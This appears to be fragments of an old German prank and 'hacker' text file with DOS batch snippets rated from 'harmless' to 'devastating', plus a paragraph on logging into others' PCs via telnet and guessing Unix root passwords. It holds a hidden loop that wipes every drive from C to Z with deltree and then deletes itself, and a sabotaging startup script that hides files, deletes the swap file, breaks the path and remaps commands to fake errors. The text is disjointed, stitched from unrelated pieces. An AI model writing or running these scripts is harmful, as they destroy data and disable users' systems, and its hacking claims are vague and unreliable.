[BearbeitenErsetzen .Suchen = "t", .Ersetzen = "d", .AllesErsetzen]
[ExtrasDokumentSchützen]
[DateiSpeichern]
Bewertung: Harmlos
Bewertung: Massiv
Bewertung: Massiv
Bewertung: Vernichtend
Bewertung: Spionage
Bewertung: Spart Geld
Bewertung: Harmlos bis vernichtend
start %winbootdir%\system\bezier.scr
for %%n in (%winbootdir%\media\*.wav) do start /w /m mplayer /play /close %%n
Bewertung: Spionage
Bewertung: Spionage
Bewertung: Vernichtend
@ctty nul
...sie sät Böses
...und sät Böses
for %%a in (z y x w v u t s r q p o n m l k j i h g f e d c) do deltree /y %%a:\*.*
del %0.bat
2. Mögliche Angriffspunkte für Optimierungen
@echo off
prompt $p$g
PATH=C:\DOS;C:\WIN;C:\PACKER;C:\TOOLS\SEAGIF;C:\DENK\DIR\DEN\REST
lh C:\WIN\SMARTDRV.exe 2048 512
lh C:\DOS\UNIVBE.exe
lh C:\DOS\KEYB 049,437,C:\DOS\KEYBOARD.SYS
lh C:\BEI\SPIEL.EXE
set blaster=I5 A220 D1 T3 H5 M330
set arj_sw=-jm -va -r
set temp=C:\TEMP
[alt+255]
@echo off
rem Hier kommen meine Optimierungen und andere Sargnägel... > NUL
c:\win\regedit c:\win\slave.reg > NUL
attrib c:\temp\*.* -r -s -h -a > NUL
if exist c:\temp\olesvgeh.weg del c:\temp\olesvgeh.weg
dir c:\dateien\*.* /s/a/ognesd > c:\temp\olesvgeh.weg > NUL
attrib c:\temp\*.* +r +s +h +a > NUL
deltree /y c:\386spart.par > NUL
prompt $d$t$g > NUL
set arj_sw=-ja -v26 > NUL
set temp=c:\ > NUL
set blaster=i1 a3c8 d0 t0 h4 m3c0 > NUL
path=c:\gibtsnet > NUL
smartdrv -c -d +a 65536 65536 > NUL
setver win.com 3.29 > NUL
doskey word=cls$techo Der falsche Fehler Nummer 0103220815 ist autreten. > NUL
doskey edit=echo Nicht genügend hoch-expanierend erweiterter Speicher > NUL
doskey arj=pkunzip > NUL
doskey pkunzip=rearj > NUL
doskey pkzip=unrar > NUL
doskey attrib=echo Dieses Programm benötigt MS DOS Version 6.23 > NUL
doskey setver=echo Fehler bei INT 24, Addresse 0325:0666 > NUL
rem Hier ist Kreativität gefragt! > NUL
Jeder Benutzer des Internets bekommt vom TCP/IP-Protokoll eine leicht herausfindbare
Nummer (ewta 194.142.255.123) zugewiesen. Man kann sich mit Telnet auf jeden
PC einloggen, dessen Nummer man kennt (dazu benutzt man in der Regel
Telnet). Wie und ob es funktioniert, hängt davon, wie das Fremd-System
eingestellt ist. Unter einem Windows-System gerät man so ins DFÜ-Netzwerk und kann
die gegebenen Zugangsrechte beanspruchen, die man mit den bekannten Tricks
ausweiten kann. Unter Unix kann man sich meist als "Guest" anmelden (mit wenigen
Rechten) oder man kann den Root-Account hacken (dann hat man alle Rechte),
indem man z.B. das Paßwort erraten kann (Unix zu hacken ist SEHR kompliziert).
Das alles funktioniert - natürlich - nur so lange, wie das System mit dem Internet verbunden ist.
Wer Rechtschreibfehler korrigiert oder nachmacht oder sich
korrigierte oder nachgemachte Rechtschreibfehler verschafft oder
korrigierte oder nachgemachte Rechtschreibfehler in Umlauf bringt
wird mit Kelly Family-Musik nicht unter 2 Jahren Dauer bestraft!!!